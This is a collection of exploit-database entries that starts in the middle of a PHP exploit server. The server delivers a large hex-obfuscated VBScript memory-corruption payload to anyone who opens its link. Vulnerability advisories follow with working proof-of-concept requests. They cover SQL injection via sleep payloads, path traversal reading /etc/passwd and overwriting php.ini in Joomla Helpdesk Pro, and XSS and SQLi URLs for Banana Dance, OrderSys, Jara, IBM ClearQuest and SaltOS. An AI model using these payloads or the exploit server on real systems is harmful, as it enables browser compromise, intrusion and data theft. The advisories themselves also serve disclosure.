    "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65".
    "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74".
    "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34".
    "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38".
    "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28".
    "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d".
    "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29".
    "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69".
    "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61".
    "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28".
    "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29".
    "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66".
    "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20".
    "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d".
    "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74".
    "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65".
    "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20".
    "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69".
    "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20".
    "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46".
    "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28".
    "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20".
    "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65".
    "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49".
    "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72".
    "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a".
    "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65".
    "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45".
    "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
    "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f".
    "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20".
    "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65".
    "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
    "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29".
    "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20".
    "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36".
    "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64".
    "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64".
    "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d".
    "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";
    $msgd=$msg;
    $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);
    
    for (;;) {
        if ($client = @socket_accept($reza)) {
            socket_write($client, "HTTP/1.1 200 OK\r\n" .
                         "Content-length: " . strlen($msgd) . "\r\n" .
                         "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
                         $msgd);
            print "\n Target Checked Your Link \n";
        }
        else usleep(100000);
    }
    
    
    ?>
HireHackking 
Document Title
==============
Joomla! plugin Helpdesk Pro < 1.4.0

Reported By
===========
Simon Rawet from Outpost24
Kristian Varnai from Outpost24
Gregor Mynarsky from Outpost24
https://www.outpost24.com/

For full details, see;
https://www.outpost24.com/outpost24-has-found-critical-vulnerabilities-in-joomla-helpdesk-pro/


Tested on
=========
All exploits were tested and verified by Outpost24 for HelpDesk Pro version 1.3.0. While no official testing has been done on earlier versions, all versions prior to 1.4.0, where the issues were finally patched, are suspected of being vulnerable.

Release Date
============
2015-07-16

CVE
===
CVE-2015-4071 CVSS: 4.0 Direct Object References
CVE-2015-4072 CVSS: 6.5 Multiple XSS
CVE-2015-4073 CVSS: 7.8 SQL Injection
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal
CVE-2015-4075 CVSS: 6.8 File Upload



Vulnerability Disclosure Timeline:
==================================
2015-05-23: Vulnerabilities discovered and reported to mitre
2015-05-25: Vendor contacted
2015-06-21: Vendor released update version: 1.4.0
2015-07-16: Public disclosure


PoC
===

Direct object references CVE-2015-4071.
Authenticated
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}

It's possible to read other users' support tickets by changing the numeric id.


XSS CVE-2015-4072.
Mostly authenticated dependent on site configuration
Output validation is universally overlooked
Example: Name and message
Path: http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1


SQLi CVE-2015-4073 for both SQLi.

There are 3 SQLi:

Authenticated
Vulnerable parameter: filter_order
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets
Post data: search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC

Unauthenticated
Vulnerable parameter: ticket_code
Path: http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23

Unauthenticated
Vulnerable parameter: email
Path: http://{url}/index.php?option=com_helpdeskpro&task=ticket.save
Post data: name=asdf&email=user@example.com"%20and%20sleep(5)%20and%20"3"="3


Local file disclosure/Path traversal CVE-2015-4074.
Unauthenticated
Path: https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe


File Upload CVE-2015-4075.
Unauthenticated
Path: http://{url}/index.php?option=com_helpdeskpro&task=language.save
Injected parameter: item, keys, attacker specified
Post data: lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;
Description: Allows for .ini files to be created wherever the web server has write access. If the .ini file already exists and is writable, it will be overwritten by the server. In a poorly configured system, this will allow for code execution by including applicable arguments in .ini files. This however is not applicable to most systems. Any non-protected .ini files will be possible to replace, with impact depending per file. This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:
;key="val
AnyData
;"
HireHackking 
source: https://www.securityfocus.com/bid/55153/info

Banana Dance is prone to cross-site-scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Banana Dance B.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000174)%3C/script%3E&category=3
http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017B)%3C/script%3E&category=3
http://www.example.com/search.php?q=234&category=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+
HireHackking 
source: https://www.securityfocus.com/bid/55147/info

OrderSys is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OrderSys 1.6.4 is vulnerable; other versions may also be affected. 

http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3
http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find
http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC
http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php)
http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E
http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor
http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC
HireHackking 
source: https://www.securityfocus.com/bid/55145/info

Jara is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jara 1.6 is vulnerable; other versions may also be affected. 

SQL Injection Vulnerabilities:

http://example.com/login.php (POST - username)

http://example.com/login.php (POST - password)

http://example.com/admin/delete_page.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_post.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_category.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_user.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_page.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_user.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_post.php (POST - id)

http://example.com/admin/edit_category.php (POST - id)


Cross-site scripting Vulnearbilities:

http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E

http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E

http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E

http://example.com/login.php (POST - username)

http://example.com/login.php (POST - password)

http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E

http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E

http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E

http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E

http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E

http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E

http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E

http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/55125/info

IBM Rational ClearQuest is prone to the following security vulnerabilities:

1. An HTML-injection vulnerability.

2. Multiple information-disclosure vulnerabilities.

3. A security-bypass vulnerability.

Attackers may leverage these issues to obtain potentially sensitive session information, bypass certain security restrictions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

The following versions are affected:

IBM Rational ClearQuest 7.1.x through versions 7.1.2.7
IBM Rational ClearQuest 8.x through versions 8.0.0.3 

https://www.example.com/snoop
https://www.example.com/hello
https://www.example.com/ivt/
https://www.example.com/hitcount
https://www.example.com/HitCount.jsp
https://www.example.com/HelloHTMLError.jsp
https://www.example.com/HelloHTML.jsp
https://www.example.com/HelloVXMLError.jsp
https://www.example.com/HelloVXML.jsp
https://www.example.com/HelloWMLError.jsp
https://www.example.com/HelloWML.jsp
https://www.example.com/cqweb/j_security_check
HireHackking 
source: https://www.securityfocus.com/bid/55117/info

SaltOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SaltOS 3.1 is vulnerable; other versions may also be affected.

http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script>